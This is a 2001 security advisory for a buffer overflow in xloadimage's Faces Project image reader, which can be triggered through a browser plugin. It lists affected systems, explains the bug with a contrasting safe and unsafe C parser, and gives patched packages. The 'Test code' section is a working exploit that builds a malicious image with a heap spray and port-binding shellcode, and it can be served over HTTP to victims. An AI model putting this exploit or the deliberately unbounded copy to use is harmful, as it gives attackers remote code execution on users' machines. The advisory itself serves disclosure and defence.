
xloadimage Buffer Overflow Vulnerability


Published: 2001-07-13
Updated: 2001-07-13
Severity:
Threat level: ordinary user access privileges
Error type: input validation error
Exploit mode: client-side

Affected systems
xloadimage xloadimage 4.1
   - RedHat Powertools 6.2
      - RedHat Linux 6.2 sparc
      - RedHat Linux 6.2 i386
      - RedHat Linux 6.2 alpha
   - Netscape Communicator 4.77
      - S.u.S.E. Linux 7.0
      - RedHat Linux 6.2 sparc
      - RedHat Linux 6.2 i386
      - RedHat Linux 6.2 alpha
      - RedHat Linux 6.1 sparc
      - RedHat Linux 6.1 i386
      - RedHat Linux 6.1 alpha
      - RedHat Linux 6.0 sparc
      - RedHat Linux 6.0 i386
      - RedHat Linux 6.0 alpha
      - RedHat Linux 5.2 sparc
      - RedHat Linux 5.2 i386
      - RedHat Linux 5.2 alpha
      - Microsoft Windows 98
      - Microsoft Windows 95
      - Microsoft Windows NT 4.0SP6a
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP6
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP5
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP4
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP3
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP2
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP1
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0
      - Microsoft Windows 2000 SP2
      - Microsoft Windows 2000 SP1
      - Microsoft Windows 2000
      - MandrakeSoft Linux Mandrake 7.1
      - MandrakeSoft Linux Mandrake 7.0
      - MandrakeSoft Linux Mandrake 6.1
      - MandrakeSoft Linux Mandrake 6.0
      - Conectiva Linux 5.1
      - Conectiva Linux 5.0
      - Conectiva Linux 4.2
      - Conectiva Linux 4.1
      - Conectiva Linux 4.0
      - Conectiva Linux 3.0
      - Caldera eServer 2.3
      - Caldera eDesktop 2.4
      - Caldera OpenLinux eBuilder 3.0
      - Caldera OpenLinux Desktop 2.3
   - Netscape Communicator 4.76
      - S.u.S.E. Linux 7.0
      - RedHat Linux 6.2 sparc
      - RedHat Linux 6.2 i386
      - RedHat Linux 6.2 alpha
      - RedHat Linux 6.1 sparc
      - RedHat Linux 6.1 i386
      - RedHat Linux 6.1 alpha
      - RedHat Linux 6.0 sparc
      - RedHat Linux 6.0 i386
      - RedHat Linux 6.0 alpha
      - RedHat Linux 5.2 sparc
      - RedHat Linux 5.2 i386
      - RedHat Linux 5.2 alpha
      - Microsoft Windows 98
      - Microsoft Windows 95
      - Microsoft Windows NT 4.0SP6a
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP6
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP5
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP4
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP3
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP2
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP1
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0
      - Microsoft Windows 2000 SP2
      - Microsoft Windows 2000 SP1
      - Microsoft Windows 2000
      - MandrakeSoft Linux Mandrake 7.1
      - MandrakeSoft Linux Mandrake 7.0
      - MandrakeSoft Linux Mandrake 6.1
      - MandrakeSoft Linux Mandrake 6.0
      - Conectiva Linux 5.1
      - Conectiva Linux 5.0
      - Conectiva Linux 4.2
      - Conectiva Linux 4.1
      - Conectiva Linux 4.0
      - Conectiva Linux 3.0
      - Caldera eServer 2.3
      - Caldera eDesktop 2.4
      - Caldera OpenLinux 2.3
      - Caldera OpenLinux eBuilder 3.0
   - Netscape Communicator 4.75
      - S.u.S.E. Linux 7.0
      - RedHat Linux 6.2 sparc
      - RedHat Linux 6.2 i386
      - RedHat Linux 6.2 alpha
      - RedHat Linux 6.1 sparc
      - RedHat Linux 6.1 i386
      - RedHat Linux 6.1 alpha
      - RedHat Linux 6.0 sparc
      - RedHat Linux 6.0 i386
      - RedHat Linux 6.0 alpha
      - RedHat Linux 5.2 sparc
      - RedHat Linux 5.2 i386
      - RedHat Linux 5.2 alpha
      - Microsoft Windows 98
      - Microsoft Windows 95
      - Microsoft Windows NT 4.0SP6a
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP6
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP5
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP4
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP3
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP2
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP1
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0
      - Microsoft Windows 2000 SP2
      - Microsoft Windows 2000 SP1
      - Microsoft Windows 2000
      - MandrakeSoft Linux Mandrake 7.1
      - MandrakeSoft Linux Mandrake 7.0
      - MandrakeSoft Linux Mandrake 6.1
      - MandrakeSoft Linux Mandrake 6.0
      - Conectiva Linux 5.1
      - Conectiva Linux 5.0
      - Conectiva Linux 4.2
      - Conectiva Linux 4.1
      - Conectiva Linux 4.0
      - Conectiva Linux 3.0
      - Caldera eServer 2.3
      - Caldera eDesktop 2.4
      - Caldera OpenLinux eBuilder 3.0
      - Caldera OpenLinux Desktop 2.3
   - Netscape Communicator 4.74
      - S.u.S.E. Linux 7.0
      - RedHat Linux 6.2 sparc
      - RedHat Linux 6.2 i386
      - RedHat Linux 6.2 alpha
      - RedHat Linux 6.1 sparc
      - RedHat Linux 6.1 i386
      - RedHat Linux 6.1 alpha
      - RedHat Linux 6.0 sparc
      - RedHat Linux 6.0 i386
      - RedHat Linux 6.0 alpha
      - RedHat Linux 5.2 sparc
      - RedHat Linux 5.2 i386
      - RedHat Linux 5.2 alpha
      - Microsoft Windows 98se
      - Microsoft Windows 98
      - Microsoft Windows 95
      - Microsoft Windows NT 4.0SP6a
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP6
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP5
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP4
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP3
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP2
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP1
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0
      - Microsoft Windows 2000 SP2
      - Microsoft Windows 2000 SP1
      - Microsoft Windows 2000
      - MandrakeSoft Linux Mandrake 7.1
      - MandrakeSoft Linux Mandrake 7.0
      - MandrakeSoft Linux Mandrake 6.1
      - MandrakeSoft Linux Mandrake 6.0
      - Conectiva Linux 5.1
      - Conectiva Linux 5.0
      - Conectiva Linux 4.2
      - Conectiva Linux 4.1
      - Conectiva Linux 4.0
      - Conectiva Linux 3.0
      - Caldera eServer 2.3
      - Caldera eDesktop 2.4
      - Caldera OpenLinux eBuilder 3.0
      - Caldera OpenLinux Desktop 2.3
   - Netscape Communicator 4.73
      - S.u.S.E. Linux 7.0
      - RedHat Linux 6.2 sparc
      - RedHat Linux 6.2 i386
      - RedHat Linux 6.2 alpha
      - RedHat Linux 6.1 sparc
      - RedHat Linux 6.1 i386
      - RedHat Linux 6.1 alpha
      - RedHat Linux 6.0 sparc
      - RedHat Linux 6.0 i386
      - RedHat Linux 6.0 alpha
      - RedHat Linux 5.2 sparc
      - RedHat Linux 5.2 i386
      - RedHat Linux 5.2 alpha
      - Microsoft Windows 98se
      - Microsoft Windows 98
      - Microsoft Windows 95
      - Microsoft Windows NT 4.0SP6a
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP6
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP5
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP4
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP3
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP2
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP1
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0
      - Microsoft Windows 2000 SP2
      - Microsoft Windows 2000 SP1
      - Microsoft Windows 2000
      - MandrakeSoft Linux Mandrake 7.1
      - MandrakeSoft Linux Mandrake 7.0
      - MandrakeSoft Linux Mandrake 6.1
      - MandrakeSoft Linux Mandrake 6.0
      - Conectiva Linux 5.1
      - Conectiva Linux 5.0
      - Conectiva Linux 4.2
      - Conectiva Linux 4.1
      - Conectiva Linux 4.0es
      - Conectiva Linux 4.0
      - Caldera eServer 2.3
      - Caldera eDesktop 2.4
      - Caldera OpenLinux eBuilder 3.0
      - Caldera OpenLinux Desktop 2.3
   - Netscape Communicator 4.72
      - S.u.S.E. Linux 7.0
      - RedHat Linux 6.2 sparc
      - RedHat Linux 6.2 i386
      - RedHat Linux 6.2 alpha
      - RedHat Linux 6.1 sparc
      - RedHat Linux 6.1 i386
      - RedHat Linux 6.1 alpha
      - RedHat Linux 6.0 sparc
      - RedHat Linux 6.0 i386
      - RedHat Linux 6.0 alpha
      - RedHat Linux 5.2 sparc
      - RedHat Linux 5.2 i386
      - RedHat Linux 5.2 alpha
      - Microsoft Windows 98
      - Microsoft Windows 95
      - Microsoft Windows NT 4.0SP6a
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP6
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP5
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP4
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP3
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP2
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP1
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0
      - Microsoft Windows 2000 SP2
      - Microsoft Windows 2000 SP1
      - Microsoft Windows 2000
      - MandrakeSoft Linux Mandrake 7.1
      - MandrakeSoft Linux Mandrake 7.0
      - MandrakeSoft Linux Mandrake 6.1
      - MandrakeSoft Linux Mandrake 6.0
      - Conectiva Linux 5.1
      - Conectiva Linux 5.0
      - Conectiva Linux 4.2
      - Conectiva Linux 4.1
      - Conectiva Linux 4.0es
      - Conectiva Linux 4.0
      - Caldera eServer 2.3
      - Caldera eDesktop 2.4
      - Caldera OpenLinux eBuilder 3.0
      - Caldera OpenLinux Desktop 2.3
   - Netscape Communicator 4.7
      - S.u.S.E. Linux 7.0
      - RedHat Linux 6.2 sparc
      - RedHat Linux 6.2 i386
      - RedHat Linux 6.2 alpha
      - RedHat Linux 6.1 sparc
      - RedHat Linux 6.1 i386
      - RedHat Linux 6.1 alpha
      - RedHat Linux 6.0 sparc
      - RedHat Linux 6.0 i386
      - RedHat Linux 6.0 alpha
      - RedHat Linux 5.2 sparc
      - RedHat Linux 5.2 i386
      - RedHat Linux 5.2 alpha
      - Microsoft Windows 98
      - Microsoft Windows 95
      - Microsoft Windows NT 4.0SP6a
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP6
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP5
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP4
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP3
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP2
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0SP1
         + Microsoft Windows NT 4.0
      - Microsoft Windows NT 4.0
      - Microsoft Windows 2000 SP2
      - Microsoft Windows 2000 SP1
      - Microsoft Windows 2000
      - Conectiva Linux 5.1
      - Conectiva Linux 5.0
      - Conectiva Linux 4.2
      - Conectiva Linux 4.1
      - Caldera eServer 2.3
      - Caldera eDesktop 2.4
      - Caldera OpenLinux eBuilder 3.0
      - Caldera OpenLinux Desktop 2.3
Description
xloadimage is a tool for displaying images of many formats on an X11 server. Its handling of the 'Faces Project' image type contains a buffer overflow. A remote attacker can craft a file that exploits this flaw to execute arbitrary code. On Red Hat, an optional Netscape plugin can invoke xloadimage to load certain image types; if that plugin is in use, a malicious file can be placed on a web site and arbitrary code executed when the target user browses to it.
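The bug class here is a fixed-size buffer filled from a header field whose length the file controls. The added example below is not xloadimage's code (the advisory does not show the actual Faces Project reader); it is a constructed parser for the same "Key: value" header layout the test file uses (FirstName, LastName, PicData), with the unbounded copy shown beside a bounded one that rejects over-long values and implausible dimensions. The field size FIELD_MAX, the 4096/32 dimension limits and the sample headers are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed layout, not xloadimage's own definitions: a Faces Project
   header is "Key: value" lines ended by a blank line, then the PicData bitmap. */
#define FIELD_MAX 64

struct faces_header {
    char first_name[FIELD_MAX];
    char last_name[FIELD_MAX];
    int width, height, depth;
};

/* Vulnerable pattern, shown for contrast and never called on untrusted input:
   strcpy copies as many bytes as the file supplies, so a long value overruns dst. */
void copy_field_unbounded(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Hardened form: reject rather than truncate, so a hostile file cannot
   silently produce a different name. Returns 1 on success, 0 if too long. */
static int copy_field_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstsz)
        return 0;
    memcpy(dst, src, n + 1);
    return 1;
}

/* Parse one header line into h. Returns 1 if accepted, 0 if malformed or oversized. */
int parse_faces_line(struct faces_header *h, const char *line)
{
    const char *colon = strchr(line, ':');
    if (!colon)
        return 0;
    size_t klen = (size_t)(colon - line);
    const char *val = colon + 1;
    while (*val == ' ' || *val == '\t')
        val++;

    if (klen == 9 && strncmp(line, "FirstName", 9) == 0)
        return copy_field_bounded(h->first_name, sizeof h->first_name, val);
    if (klen == 8 && strncmp(line, "LastName", 8) == 0)
        return copy_field_bounded(h->last_name, sizeof h->last_name, val);
    if (klen == 7 && strncmp(line, "PicData", 7) == 0) {
        if (sscanf(val, "%d %d %d", &h->width, &h->height, &h->depth) != 3)
            return 0;
        /* Dimensions drive the bitmap allocation later; bound them too
           (limits are assumed values for this example). */
        if (h->width <= 0 || h->height <= 0 || h->depth <= 0 ||
            h->width > 4096 || h->height > 4096 || h->depth > 32)
            return 0;
        return 1;
    }
    return 1; /* unknown keys are ignored, as a lenient reader would */
}

/* Parse a whole header (lines split on '\n', ended by a blank line).
   Returns the number of accepted lines, or -1 at the first rejected line. */
int parse_faces_header(struct faces_header *h, const char *text)
{
    memset(h, 0, sizeof *h);
    int accepted = 0;
    const char *p = text;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len == 0)
            break;                    /* blank line ends the header */
        char line[512];
        if (len >= sizeof line)
            return -1;                /* over-long line: reject outright */
        memcpy(line, p, len);
        line[len] = '\0';
        if (!parse_faces_line(h, line))
            return -1;
        accepted++;
        if (!nl)
            break;
        p = nl + 1;
    }
    return accepted;
}

/* Constructed sample input: a benign header. */
static const char GOOD[] = "FirstName: Ada\nLastName: Lovelace\nPicData: 48 48 1\n\n";

int good_header_ok(void)
{
    struct faces_header h;
    return parse_faces_header(&h, GOOD) == 3 &&
           strcmp(h.last_name, "Lovelace") == 0 && h.width == 48;
}

/* Constructed sample input shaped like the advisory's test file: a LastName
   value of 200 bytes, far beyond FIELD_MAX. */
int long_lastname_rejected(void)
{
    char text[300];
    struct faces_header h;
    strcpy(text, "LastName: ");
    for (size_t i = strlen(text); i < 210; i++)
        text[i] = 'X';
    text[210] = '\n'; text[211] = '\n'; text[212] = '\0';
    return parse_faces_header(&h, text) == -1;
}

int huge_picdata_rejected(void)
{
    struct faces_header h;
    return parse_faces_header(&h, "PicData: 99999 99999 8\n\n") == -1;
}

int main(void)
{
    printf("good header accepted: %d\n", good_header_ok());
    printf("long LastName rejected: %d\n", long_lastname_rejected());
    printf("huge PicData rejected: %d\n", huge_picdata_rejected());
    return 0;
}
```

The bounded copy returns failure instead of truncating with strncpy, because a silently truncated field hides the fact that the file was hostile; the whole header is then discarded, which is the behaviour a viewer invoked from a browser plugin should have on malformed input.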

Test code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

//#define TARGET 0x080e1337
//as 1337 as the 1337357 kiddies.
#define TARGET 0xdeadbeef


// lamagra's port binding shell code (from bind.c in the sc.tar.gz)
//
char lamagra_bind_code[] =
  "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
  "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
  "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x1d\x29\x89\x4d\xf0"
  "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
  "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
  "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
  "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
  "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";


// slight modification so it listens on 7465 instead of 3879
// TAGS is easier to remember ;]


// Returns an 8200-byte buffer: a nop sled with jmp +120 stepping stones
// when doit == 0, or the sled with the bind shellcode at offset 7000 when doit == 1.
char *
this (int doit)
{
  char *p;
  int v;
  p = (char *) malloc (8200);
  memset (p, 0x90, 8200);
  if (!doit)
    for (v = 0; v < 8100; v += 122)
      {
        p[v] = 0xeb;
        p[v + 1] = 120;
      }
  if (doit)
    memcpy (&p[7000], lamagra_bind_code, strlen (lamagra_bind_code));
  p[8199] = 0;


  return p;
}


int
main (int argc, char **argv)
{
  int z0, x = TARGET;
  int z1, y = x;
  int p;
  char *q;
  (void) argv;
  // Any argument makes the output a complete HTTP response for serving via the plugin
  if (argc > 1)
    printf ("HTTP/1.0 200\nContent-Type: image/x-tiff\n\n");
  printf ("FirstName: %s\n", this (0));
  printf ("LastName: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");
  printf ("%s\n", &x);
// Begin Padding Heap With 'Garbage' (nop/jmp)
  printf ("%s", this (0));
  printf ("%s", this (0));
  printf ("%s", this (0));
  printf ("%s", this (0));
  printf ("%s", this (0));
  printf ("%s", this (0));
// End Padding Heap With 'Garbage' (nop/jmp)
  printf ("%s", this (1));
  printf ("http://www.mp3.com/cosv");
  printf ("\nPicData: 32 32 8\n");
  printf ("\n");
  for (p = 0; p < 9994; p += 1)
    printf ("A");
  return 0;
} // EOF -- tstot.c --

Solution
Disable xloadimage in the /etc/pluggerrc file, or download the updated packages:



xloadimage xloadimage 4.1:

Red Hat RPM 6.2 alpha xloadimage-4.1-19.6.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/xloadimage-4.1-19.6.alpha.rpm

Red Hat RPM 6.2 i386 xloadimage-4.1-19.6.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/xloadimage-4.1-19.6.i386.rpm

Red Hat RPM 6.2 sparc xloadimage-4.1-19.6.sparc.rpm
ftp://updates.redhat.com/6.2/en/os/sparc/xloadimage-4.1-19.6.sparc.rpm

Red Hat RPM 6.2 i386 xloadimage-4.1-20.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/xloadimage-4.1-20.i386.rpm

Red Hat RPM 7.1 alpha xloadimage-4.1-20.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/xloadimage-4.1-20.alpha.rpm

Red Hat RPM 7.1 i386 xloadimage-4.1-20.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/xloadimage-4.1-20.i386.rpm

Related information